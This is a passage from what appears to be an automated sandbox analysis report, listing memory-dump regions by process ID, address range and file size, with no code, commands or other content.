                                                                                                                                                                                                                                                                                    80KB

                                                                                                                                                                                                                                                                                  • memory/3884-409-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/3920-335-0x0000000004010000-0x00000000040AD000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    628KB

                                                                                                                                                                                                                                                                                  • memory/3920-331-0x0000000000400000-0x00000000023FF000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    32.0MB

                                                                                                                                                                                                                                                                                  • memory/3920-129-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/3936-554-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/4036-538-0x00007FF634944060-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/4068-337-0x00000000023B0000-0x000000000245E000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    696KB

                                                                                                                                                                                                                                                                                  • memory/4068-326-0x0000000000400000-0x00000000023AE000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    31.7MB

                                                                                                                                                                                                                                                                                  • memory/4068-166-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/4168-348-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/4184-508-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/4264-341-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/4480-507-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/4492-486-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/4656-358-0x000000000041A616-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/4656-379-0x0000000005090000-0x0000000005696000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    6.0MB

                                                                                                                                                                                                                                                                                  • memory/4716-260-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    128KB

                                                                                                                                                                                                                                                                                  • memory/4716-318-0x0000000005540000-0x0000000005B46000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    6.0MB

                                                                                                                                                                                                                                                                                  • memory/4716-268-0x000000000041A616-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/4724-391-0x0000000001340000-0x0000000001342000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                  • memory/4724-365-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/4740-264-0x0000000000400000-0x000000000041B000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    108KB

                                                                                                                                                                                                                                                                                  • memory/4740-332-0x0000000000400000-0x000000000041B000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    108KB

                                                                                                                                                                                                                                                                                  • memory/4740-271-0x00000000004057F0-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/4748-270-0x000000000041A772-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/4748-330-0x00000000054A0000-0x000000000599E000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    5.0MB

                                                                                                                                                                                                                                                                                  • memory/4748-263-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    128KB

                                                                                                                                                                                                                                                                                  • memory/4756-269-0x000000000041A5EA-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/4756-262-0x0000000000400000-0x0000000000448000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    288KB

                                                                                                                                                                                                                                                                                  • memory/4756-323-0x0000000005000000-0x0000000005606000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    6.0MB

                                                                                                                                                                                                                                                                                  • memory/4772-255-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/4784-256-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/4824-352-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/4932-297-0x0000000000402FAB-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/4932-305-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    36KB

                                                                                                                                                                                                                                                                                  • memory/4948-343-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/4980-351-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    12KB

                                                                                                                                                                                                                                                                                  • memory/4980-342-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/5136-474-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/5144-503-0x0000000000418FA6-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/5148-436-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                  • memory/5148-420-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                  • memory/5148-429-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                  • memory/5148-435-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                  • memory/5148-412-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/5148-415-0x00000000001F0000-0x00000000001F1000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                  • memory/5148-419-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                  • memory/5148-421-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                  • memory/5148-427-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                  • memory/5148-426-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                  • memory/5148-424-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                  • memory/5148-432-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                  • memory/5148-423-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                  • memory/5376-510-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/5464-513-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/5768-484-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/5792-485-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/5808-460-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/5828-461-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/6064-471-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/6088-472-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/6140-501-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/6304-574-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                  • memory/6400-577-0x0000000000000000-mapping.dmp